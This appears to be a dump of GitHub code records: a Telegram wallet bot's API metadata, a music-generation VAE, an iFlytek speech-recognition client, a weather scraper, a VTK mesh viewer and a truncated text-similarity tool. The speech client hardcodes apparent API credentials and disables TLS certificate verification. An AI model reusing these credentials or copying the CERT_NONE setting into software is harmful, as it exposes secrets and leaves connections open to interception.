"aiogram.types.InlineKeyboardMarkup", "line_number": 72, "usage_type": "call"}, {"api_name": "crud.user.check_user", "line_number": 73, "usage_type": "call"}, {"api_name": "crud.user.get_name", "line_number": 74, "usage_type": "call"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 75, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.new", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 81, "usage_type": "name"}, {"api_name": "bot.dp.message_handler", "line_number": 69, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 69, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 90, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 91, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 91, "usage_type": "name"}, {"api_name": "crud.wallet.get_all_wallets_names", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.wallet.get_balance", "line_number": 94, "usage_type": "call"}, {"api_name": "bot.bot.send_message", "line_number": 95, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 95, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 97, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 97, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 89, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", 
"line_number": 89, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 102, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 102, "usage_type": "name"}, {"api_name": "crud.user.check_user", "line_number": 105, "usage_type": "call"}, {"api_name": "crud.wallet.get_all_wallets", "line_number": 106, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardMarkup", "line_number": 108, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.remove.set", "line_number": 109, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.remove", "line_number": 109, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 109, "usage_type": "name"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.new", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 113, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 115, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 115, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_reply_markup", "line_number": 116, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 116, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 118, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 118, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 118, "usage_type": "name"}, {"api_name": "bot.bot.send_message", "line_number": 120, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 120, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 101, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 101, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 101, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 124, "usage_type": "name"}, {"api_name": "bot.bot.answer_callback_query", "line_number": 125, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 125, "usage_type": "name"}, {"api_name": "crud.wallet.remove_wallet", "line_number": 127, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle.set", "line_number": 128, "usage_type": "call"}, {"api_name": "states.WalletState.WalletMenuState.idle", "line_number": 128, "usage_type": "attribute"}, {"api_name": "states.WalletState.WalletMenuState", "line_number": 128, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 129, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 129, "usage_type": "name"}, {"api_name": "utils.keyboards.wallet_menu.wallet_menu_kb", "line_number": 129, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 123, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 123, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 123, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 133, "usage_type": "name"}, {"api_name": "states.UserState.UserState.in_menu.set", "line_number": 134, "usage_type": "call"}, 
{"api_name": "states.UserState.UserState.in_menu", "line_number": 134, "usage_type": "attribute"}, {"api_name": "states.UserState.UserState", "line_number": 134, "usage_type": "name"}, {"api_name": "bot.bot.edit_message_text", "line_number": 135, "usage_type": "call"}, {"api_name": "bot.bot", "line_number": 135, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.main_menu_kb", "line_number": 135, "usage_type": "name"}, {"api_name": "bot.dp.callback_query_handler", "line_number": 132, "usage_type": "call"}, {"api_name": "bot.dp", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.keyboards.main_menu.wallet_cb.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "utils.keyboards.main_menu.wallet_cb", "line_number": 132, "usage_type": "name"}]}
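The wallet_cb factory used throughout these handlers is imported from utils.keyboards.main_menu and is not shown in this file. In aiogram 2.x it is typically a CallbackData factory; the prefix 'wallet' below is an assumption, while the 'name' and 'action' parts are inferred from the wallet_cb.new(name=..., action=...) and wallet_cb.filter(action=...) calls above:

from aiogram.utils.callback_data import CallbackData

# packs button payloads as "wallet:<name>:<action>" and parses them back in handlers
wallet_cb = CallbackData('wallet', 'name', 'action')

data = wallet_cb.new(name='savings', action='get_wallet')   # -> "wallet:savings:get_wallet"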
+{"seq_id": "71645577448", "text": "from music21 import instrument\nfrom MLSongs.database.db_services import get_songs_by_author\nfrom MLSongs.ml_agents.ml_model_base import MLModelBase\nfrom MLSongs.ml_agents.postprocessing_utils import sample, create_midi_with_embedded_durations, \\\n change_midi_instrument, midi_to_wav\nfrom MLSongs.ml_agents.preprocessing_utils import get_chords_and_durations_of_instrument, \\\n create_mapper_data, create_mapper, encode_notes, clear_encoded_data, \\\n parse_everything_together, filter_outliers\nfrom MLSongs.ml_agents.utilities import combine_chords_with_durations, get_key_from_value\nimport numpy as np\n\n\nclass MusicVAE(MLModelBase):\n\n def __init__(self, instrument_str):\n if \"bass\" in instrument_str.lower():\n self.target_instrument_str = \"Electric Bass\"\n self.target_instrument = instrument.ElectricBass()\n self.instrument_name = \"bass\"\n super(MusicVAE, self).__init__(\"MusicVAEBass\", \"ml_models/VAE_bassdecoder.h5\")\n if \"guitar\" in instrument_str.lower():\n self.target_instrument_str = \"Electric Guitar\"\n self.target_instrument = instrument.ElectricGuitar()\n self.instrument_name = \"guitar\"\n super(MusicVAE, self).__init__(\"MusicVAEGuitar\", \"ml_models/VAE_guitar_long_decoder.h5\")\n self.slice_len = 256\n self.latent_dim = 256\n\n def preprocess_data(self, data):\n allchords, alldurations = get_chords_and_durations_of_instrument(data, self.target_instrument_str)\n\n assert (len(allchords) == len(alldurations))\n\n combined = []\n for i in range(len(allchords)):\n combined.append(combine_chords_with_durations(allchords[i], alldurations[i]))\n\n self.mapper = create_mapper(create_mapper_data(combined))\n guitar_chords = encode_notes(combined, self.mapper)\n guitar_chords = clear_encoded_data(guitar_chords, self.mapper)\n\n guitar_input, guitar_output = parse_everything_together(guitar_chords, self.slice_len)\n\n outlier_constant = 80\n guitar_input, guitar_output, self.mapper_list = filter_outliers(guitar_input, guitar_output, outlier_constant)\n\n input = np.reshape(np.asarray(guitar_input), (len(guitar_input), self.slice_len, 1))\n\n input = np.asarray(input) / float(len(self.mapper))\n\n return input\n\n def predict(self, input, count, temp):\n songs_in_db_cnt = len(get_songs_by_author(self.db_name))\n to_generate = count\n\n for j in range(songs_in_db_cnt, songs_in_db_cnt + to_generate):\n\n noise = np.random.normal(size=self.latent_dim)\n noise = np.expand_dims(noise, 0)\n pred = self.model.predict(noise)\n\n predicted = []\n for i in pred:\n for k in i:\n index = sample(k, temp)\n if self.mapper_list is not None: # Idx of the mapper list is the new value, the element is the old value. 
This is used when I filter for outliers.\n index = self.mapper_list[index]\n pred_note = get_key_from_value(index, self.mapper)\n predicted.append(pred_note)\n\n\n midi_path = f'MusicVAE_{self.instrument_name}_{j}.mid'\n create_midi_with_embedded_durations(predicted, target_instrument=self.target_instrument, filename=midi_path)\n\n change_midi_instrument(midi_path, self.target_instrument)\n midi_to_wav(midi_path, f'static/songs/MusicVAE_{self.instrument_name}_{j}.wav')\n\n self.save_song_to_db(f'MusicVAE_{self.instrument_name}_{j}.wav')", "repo_name": "darkpanther99/DeepLearningMusicGeneration", "sub_path": "DjangoApp/MLSongs/ml_agents/MusicVAE.py", "file_name": "MusicVAE.py", "file_ext": "py", "file_size_in_byte": 3588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "MLSongs.ml_agents.ml_model_base.MLModelBase", "line_number": 13, "usage_type": "name"}, {"api_name": "music21.instrument.ElectricBass", "line_number": 18, "usage_type": "call"}, {"api_name": "music21.instrument", "line_number": 18, "usage_type": "name"}, {"api_name": "music21.instrument.ElectricGuitar", "line_number": 23, "usage_type": "call"}, {"api_name": "music21.instrument", "line_number": 23, "usage_type": "name"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.get_chords_and_durations_of_instrument", "line_number": 30, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.utilities.combine_chords_with_durations", "line_number": 36, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.create_mapper", "line_number": 38, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.create_mapper_data", "line_number": 38, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.encode_notes", "line_number": 39, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.clear_encoded_data", "line_number": 40, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.parse_everything_together", "line_number": 42, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.preprocessing_utils.filter_outliers", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 49, "usage_type": "call"}, {"api_name": "MLSongs.database.db_services.get_songs_by_author", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 60, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.sample", "line_number": 66, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.utilities.get_key_from_value", "line_number": 69, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.create_midi_with_embedded_durations", "line_number": 74, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.change_midi_instrument", "line_number": 76, "usage_type": "call"}, {"api_name": "MLSongs.ml_agents.postprocessing_utils.midi_to_wav", "line_number": 77, "usage_type": "call"}]}
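The sample() helper above is imported from MLSongs.ml_agents.postprocessing_utils and is not shown in this record. A common way to implement the temperature sampling it performs, which this sketch assumes, is to rescale the decoder's probability vector before drawing an index:

import numpy as np

def sample(preds, temperature=1.0):
    # temperature < 1 sharpens the distribution, > 1 flattens it
    preds = np.asarray(preds).astype('float64')
    preds = np.log(preds + 1e-9) / temperature
    exp_preds = np.exp(preds)
    preds = exp_preds / np.sum(exp_preds)
    # draw one index from the rescaled distribution
    return int(np.argmax(np.random.multinomial(1, preds, 1)))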
+{"seq_id": "42766121622", "text": "#### iFlytek (讯飞) speech recognition API client\r\nimport websocket\r\nimport datetime\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport json\r\nfrom urllib.parse import urlencode\r\nimport time\r\nimport ssl\r\nfrom wsgiref.handlers import format_date_time\r\nfrom datetime import datetime\r\nfrom time import mktime\r\nimport _thread as thread\r\n\r\nSTATUS_FIRST_FRAME = 0 # marks the first audio frame\r\nSTATUS_CONTINUE_FRAME = 1 # marks an intermediate frame\r\nSTATUS_LAST_FRAME = 2 # marks the last frame\r\n\r\n\r\nclass Ws_Param(object):\r\n    # initialisation\r\n    def __init__(self, APPID, APIKey, APISecret, AudioFile):\r\n        self.APPID = APPID\r\n        self.APIKey = APIKey\r\n        self.APISecret = APISecret\r\n        self.AudioFile = AudioFile\r\n\r\n        # common parameters\r\n        self.CommonArgs = {\"app_id\": self.APPID}\r\n        # business parameters; more options are documented on the official site\r\n        self.BusinessArgs = {\"domain\": \"iat\", \"language\": \"zh_cn\", \"accent\": \"mandarin\", \"vinfo\": 1, \"vad_eos\": 10000,\r\n                             \"wbest\": 5, \"dwa\": \"wpgs\", \"ptt\": 0}\r\n\r\n    def set_audiofile(self, path):\r\n        self.AudioFile = path\r\n\r\n    # build the signed websocket url\r\n    def create_url(self):\r\n        url = 'wss://ws-api.xfyun.cn/v2/iat'\r\n        # generate an RFC1123-format timestamp\r\n        now = datetime.now()\r\n        date = format_date_time(mktime(now.timetuple()))\r\n\r\n        # assemble the string to be signed\r\n        signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n        signature_origin += \"date: \" + date + \"\\n\"\r\n        signature_origin += \"GET \" + \"/v2/iat \" + \"HTTP/1.1\"\r\n        # sign it with HMAC-SHA256\r\n        signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n                                 digestmod=hashlib.sha256).digest()\r\n        signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n        authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n            self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n        authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n        # collect the authentication parameters into a dict\r\n        v = {\r\n            \"authorization\": authorization,\r\n            \"date\": date,\r\n            \"host\": \"ws-api.xfyun.cn\"\r\n        }\r\n        # append the authentication parameters to build the final url\r\n        url = url + '?' + urlencode(v)\r\n        # print(\"date: \",date)\r\n        # print(\"v: \",v)\r\n        # prints the connection url; when adapting this demo, uncomment the prints above to check that the url generated with the same parameters matches your own\r\n        # print('websocket url :', url)\r\n        return url\r\n\r\n\r\nwsParam = Ws_Param(APPID='928e7cbe', APISecret='Mzk2Mzg3NTExZjQyMDQ2YmEyZmU4Mjk3',\r\n                   APIKey='0ae993b84bc791fd8b7bd03a14790c74',\r\n                   AudioFile=r'reading_system/static/wav/20236115268眸.wav')\r\n\r\n\r\nclass Recognize(object):\r\n    def __init__(self):\r\n        self.rset = []\r\n\r\n    # handle an incoming websocket message\r\n    def on_message(self, ws, message):\r\n        try:\r\n            code = json.loads(message)[\"code\"]\r\n            sid = json.loads(message)[\"sid\"]\r\n            if code != 0:\r\n                errMsg = json.loads(message)[\"message\"]\r\n                print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\r\n\r\n            else:\r\n                data = json.loads(message)[\"data\"][\"result\"][\"ws\"]\r\n\r\n                for i in data:\r\n                    for w in i[\"cw\"]:\r\n                        self.rset.append(w[\"w\"])\r\n        except Exception as e:\r\n            print(\"received msg, but parse exception:\", e)\r\n\r\n    # handle a websocket error\r\n    def on_error(self, ws, error):\r\n        # print(\"### error:\", error)\r\n        pass\r\n\r\n    # handle the websocket closing\r\n    def on_close(self, ws, a, b):\r\n        # print(\"### closed ###\")\r\n        pass\r\n\r\n    # handle the websocket connection opening\r\n    def on_open(self, ws):\r\n        def run(*args):\r\n            frameSize = 8000 # audio bytes per frame\r\n            interval = 0.04 # delay between frames (seconds)\r\n            status = STATUS_FIRST_FRAME # frame status: first, intermediate or last\r\n            with open(wsParam.AudioFile, \"rb\") as fp:\r\n                while True:\r\n                    buf = fp.read(frameSize)\r\n                    # end of file\r\n                    if not buf:\r\n                        status = STATUS_LAST_FRAME\r\n                    # first frame:\r\n                    # send the first audio frame together with the business parameters;\r\n                    # app_id is required and is only sent with this frame\r\n                    if status == STATUS_FIRST_FRAME:\r\n\r\n                        d = {\"common\": wsParam.CommonArgs,\r\n                             \"business\": wsParam.BusinessArgs,\r\n                             \"data\": {\"status\": 0, \"format\": \"audio/L16;rate=16000\",\r\n                                      \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n                                      \"encoding\": \"raw\"}}\r\n                        d = json.dumps(d)\r\n                        ws.send(d)\r\n                        status = STATUS_CONTINUE_FRAME\r\n                    # intermediate frames\r\n                    elif status == STATUS_CONTINUE_FRAME:\r\n                        d = {\"data\": {\"status\": 1, \"format\": \"audio/L16;rate=16000\",\r\n                                      \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n                                      \"encoding\": \"raw\"}}\r\n                        ws.send(json.dumps(d))\r\n                    # last frame\r\n                    elif status == STATUS_LAST_FRAME:\r\n                        d = {\"data\": {\"status\": 2, \"format\": \"audio/L16;rate=16000\",\r\n                                      \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n                                      \"encoding\": \"raw\"}}\r\n                        ws.send(json.dumps(d))\r\n                        time.sleep(1)\r\n                        break\r\n                    # simulate the audio sampling interval\r\n                    time.sleep(interval)\r\n            ws.close()\r\n\r\n        thread.start_new_thread(run, ())\r\n\r\n    def recognize(self, path):\r\n        self.rset = []\r\n        wsParam.set_audiofile(path)\r\n        websocket.enableTrace(False)\r\n        wsUrl = wsParam.create_url()\r\n        ws = websocket.WebSocketApp(wsUrl, on_message=self.on_message, on_error=self.on_error,\r\n                                    on_close=self.on_close)\r\n        ws.on_open = self.on_open\r\n        ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n        return self.rset\r\n\r\n\r\nifly_recognize = Recognize()\r\n", "repo_name": "NJNUqhx/ReadingSystem", "sub_path": "TestReadingSystem/reading_system/utils/Voice2.py", "file_name": "Voice2.py", "file_ext": "py", "file_size_in_byte": 6682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "wsgiref.handlers.format_date_time", "line_number": 43, "usage_type": "call"}, {"api_name": "time.mktime", 
"line_number": 43, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 50, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 51, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 52, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 64, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 85, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 137, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 139, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 143, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 149, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 152, "usage_type": "call"}, {"api_name": "websocket.enableTrace", "line_number": 157, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 159, "usage_type": "call"}, {"api_name": "ssl.CERT_NONE", "line_number": 162, "usage_type": "attribute"}]}
+{"seq_id": "11764654409", "text": "from lxml import html\nimport requests\n\ndef frsn_wx():\n    # Load the 93704 (Fresno, CA) forecast page\n    page = requests.get('http://bit.ly/2dDCkAt')\n    # Parse the HTML page content\n    tree = html.fromstring(page.content)\n    # Take the text value from the current-conditions p element\n    temp = tree.xpath('//p[@class=\"myforecast-current-lrg\"]/text()')\n    # Convert temp to a string and slice off the surrounding list syntax\n    wex = str(temp)[3:5]\n    # Convert wex to an integer just in case\n    wx = int(wex)\n    print('It is currently {}F in Fresno, Ca'.format(wx))\n\nfrsn_wx()\n", "repo_name": "n6osb/fresno_wx", "sub_path": "wx_report.py", "file_name": "wx_report.py", "file_ext": "py", "file_size_in_byte": 513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 8, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 8, "usage_type": "name"}]}
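Slicing str(temp)[3:5] only works while the reading is exactly two digits, so values like 9F or 104F would break it. A sketch of a more tolerant parse of the same XPath result, assuming the page still renders text like "72°F":

import re
import requests
from lxml import html

def fresno_temp():
    page = requests.get('http://bit.ly/2dDCkAt')
    tree = html.fromstring(page.content)
    readings = tree.xpath('//p[@class="myforecast-current-lrg"]/text()')
    # pull the first signed integer out of the reading instead of hard slicing
    match = re.search(r'-?\d+', readings[0]) if readings else None
    return int(match.group()) if match else None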
+{"seq_id": "70196267690", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 03 17:58:12 2016\n\n@author: Ben\n\"\"\"\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\n print_function, unicode_literals)\nimport vtk\nfrom vtk import vtkQuad\n\nclass MeshViewer(object):\n \n def __init__(self, mesh):\n self.mesh = mesh\n \n def render(self):\n self._generate_points()\n self._build_quads()\n self._build_viewing_heirarchy()\n self.renderWindow.Render()\n self.interactor.Start()\n \n def _generate_points(self):\n self.points = vtk.vtkPoints()\n for node in self.mesh.nodes:\n self.points.InsertNextPoint(node.location)\n \n def _build_quads(self):\n \n self.cellArray = vtk.vtkCellArray()\n \n for element in self.mesh.elements:\n quad = vtkQuad()\n quad.GetPointIds().SetId(0, element.nodes[0].id)\n quad.GetPointIds().SetId(1, element.nodes[1].id)\n quad.GetPointIds().SetId(2, element.nodes[2].id)\n quad.GetPointIds().SetId(3, element.nodes[3].id)\n \n self.cellArray.InsertNextCell(quad)\n \n def _build_viewing_heirarchy(self):\n self.poly = vtk.vtkPolyData()\n self.poly.SetPoints(self.points)\n self.poly.SetPolys(self.cellArray)\n \n self.mapper = vtk.vtkPolyDataMapper()\n self.mapper.SetInput(self.poly)\n \n self.actor = vtk.vtkActor()\n self.actor.SetMapper(self.mapper)\n self.actor.GetProperty().SetInterpolationToFlat()\n self.actor.GetProperty().SetEdgeColor(1.0, 0.0, 0.0) #(R,G,B)\n self.actor.GetProperty().EdgeVisibilityOn()\n \n self.renderer = vtk.vtkRenderer()\n self.renderer.AddActor(self.actor)\n \n self.renderWindow = vtk.vtkRenderWindow()\n self.renderWindow.AddRenderer(self.renderer)\n \n self.interactor = vtk.vtkRenderWindowInteractor()\n self.interactor.SetRenderWindow(self.renderWindow)", "repo_name": "BenjaminETaylor/strangle", "sub_path": "strengl/analyze/fea/viewer.py", "file_name": "viewer.py", "file_ext": "py", "file_size_in_byte": 2057, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vtk.vtkPoints", "line_number": 25, "usage_type": "call"}, {"api_name": "vtk.vtkCellArray", "line_number": 31, "usage_type": "call"}, {"api_name": "vtk.vtkQuad", "line_number": 34, "usage_type": "call"}, {"api_name": "vtk.vtkPolyData", "line_number": 43, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 47, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 50, "usage_type": "call"}, {"api_name": "vtk.vtkRenderer", "line_number": 56, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindow", "line_number": 59, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindowInteractor", "line_number": 62, "usage_type": "call"}]}
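MeshViewer only touches mesh.nodes (each needing a .location and, via the elements, an .id) and mesh.elements (each holding four nodes). A minimal stand-in that satisfies that interface, handy for exercising the viewer without the rest of the package; all class names below are hypothetical:

class Node:
    def __init__(self, id, location):
        self.id = id                # index of the point in the vtkPoints array
        self.location = location    # (x, y, z) tuple

class Element:
    def __init__(self, nodes):
        self.nodes = nodes          # exactly four Node objects per quad

class Mesh:
    def __init__(self, nodes, elements):
        self.nodes = nodes
        self.elements = elements

corners = [Node(0, (0, 0, 0)), Node(1, (1, 0, 0)), Node(2, (1, 1, 0)), Node(3, (0, 1, 0))]
MeshViewer(Mesh(corners, [Element(corners)])).render()

Note that vtkPolyDataMapper.SetInput() was dropped in VTK 6, so on current VTK builds the call in _build_viewing_heirarchy would need to be SetInputData().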
+{"seq_id": "28430482268", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 5 16:09:13 2022\n\n@author: sjuf9909\n@reviewer/reviser: Chao Sun@SIH\n\"\"\"\n# import required packages\nimport codecs\nimport hashlib\nimport io\nimport os\nimport zipfile\nfrom tqdm import tqdm\nfrom zipfile import ZipFile\nfrom pathlib import Path\nfrom itertools import chain\nimport re\n\nfrom IPython.display import clear_output\n\n# import tools to calculate Jaccard similarity\nfrom datasketch import MinHash, MinHashLSH\n\n# pandas and numpy: tools for data processing\nimport pandas as pd\nimport numpy as np\n\n# matplotlib & seaborn: visualization tools\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport swifter\n\n# Bokeh: interactive plots\nfrom bokeh.io import output_notebook\nfrom bokeh.models import ColorBar, LabelSet, ColumnDataSource, HoverTool\nfrom bokeh.plotting import figure, show\nfrom bokeh.transform import linear_cmap\nfrom bokeh.models import FuncTickFormatter \noutput_notebook()\n\n# html visualization\nfrom diffviz import html_diffs\n\n# NLTK and gensim: natural language processing tools for working with language/text data\nimport nltk\nfrom nltk import ngrams\nfrom gensim.utils import tokenize\n\n# ipywidgets: tools for interactive browser controls in Jupyter notebooks\nimport ipywidgets as widgets\nfrom ipywidgets import Layout\nfrom IPython.display import display, clear_output, FileLink, HTML\n\n# import other packages\nfrom utils import get_projectpaths\n(projectroot, rawdatapath, cleandatapath, processeddatapath) = get_projectpaths()\n\n\nclass DownloadFileLink(FileLink):\n '''\n Create link to download files in Jupyter Notebook\n '''\n html_link_str = \"{link_text} \"\n\n def __init__(self, path, file_name=None, link_text=None, *args, **kwargs):\n super(DownloadFileLink, self).__init__(path, *args, **kwargs)\n\n self.file_name = file_name or os.path.split(path)[1]\n self.link_text = link_text or self.file_name\n\n def _format_path(self):\n from html import escape\n\n fp = \"\".join([self.url_prefix, escape(self.path)])\n return \"\".join(\n [\n self.result_html_prefix,\n self.html_link_str.format(\n link=fp, file_name=self.file_name, link_text=self.link_text\n ),\n self.result_html_suffix,\n ]\n )\n \n\nclass DocumentSimilarity():\n '''\n Using Jaccard similarity to identify similar documents in a corpus\n '''\n def __init__(self):\n '''\n Initiate the DocumentSimilarity\n '''\n # initiate other necessary variables\n self.large_file_size = 1000000\n self.exclude_punc = False\n \n # create an output folder if not already exist\n os.makedirs('output', exist_ok=True)\n \n # initiate the variables for file uploading\n self.file_uploader = widgets.FileUpload(\n description='Upload your files (txt, csv, xlsx or zip)',\n accept='.txt, .xlsx, .csv, .zip', # accepted file extension\n multiple=True, # True to accept multiple files\n error='File upload unsuccessful. 
Please try again!',\n layout = widgets.Layout(width='320px')\n )\n \n self.upload_out = widgets.Output()\n \n # give notification when file is uploaded\n def _cb(change):\n with self.upload_out:\n if self.file_uploader.value!=():\n # clear output and give notification that file is being uploaded\n clear_output()\n \n # check file size\n self.check_file_size(self.file_uploader)\n \n # reading uploaded files\n self.process_upload()\n \n # give notification when uploading is finished\n print('Finished uploading files.')\n print('{} text documents are loaded for tagging.'.format(self.text_df.shape[0]))\n \n # clear saved value in cache and reset counter\n self.file_uploader.value = ()\n \n # observe when file is uploaded and display output\n self.file_uploader.observe(_cb, names='value')\n self.upload_box = widgets.VBox([self.file_uploader, self.upload_out])\n \n # CSS styling \n self.style = \"\"\"\n \n \"\"\"\n \n \n def click_button_widget(\n self, \n desc: str, \n margin: str='10px 0px 0px 10px',\n width='320px'\n ):\n '''\n Create a widget to show the button to click\n \n Args:\n desc: description to display on the button widget\n margin: top, right, bottom and left margins for the button widget\n '''\n # widget to show the button to click\n button = widgets.Button(description=desc, \n layout=Layout(margin=margin, width=width),\n style=dict(font_style='italic',\n font_weight='bold'))\n \n # the output after clicking the button\n out = widgets.Output()\n \n return button, out\n \n \n def check_file_size(self, uploaded_file):\n '''\n Function to check the uploaded file size\n \n Args:\n uploaded_file: the uploaded file containing the text data\n '''\n # check total uploaded file size\n total_file_size = sum([file['size'] for file in uploaded_file.value])\n print('The total size of the upload is {:.2f} MB.'.format(total_file_size/1000000))\n \n # display warning for individual large files (>1MB)\n large_text = [file['name'] for file in uploaded_file.value \\\n if file['size']>self.large_file_size and \\\n 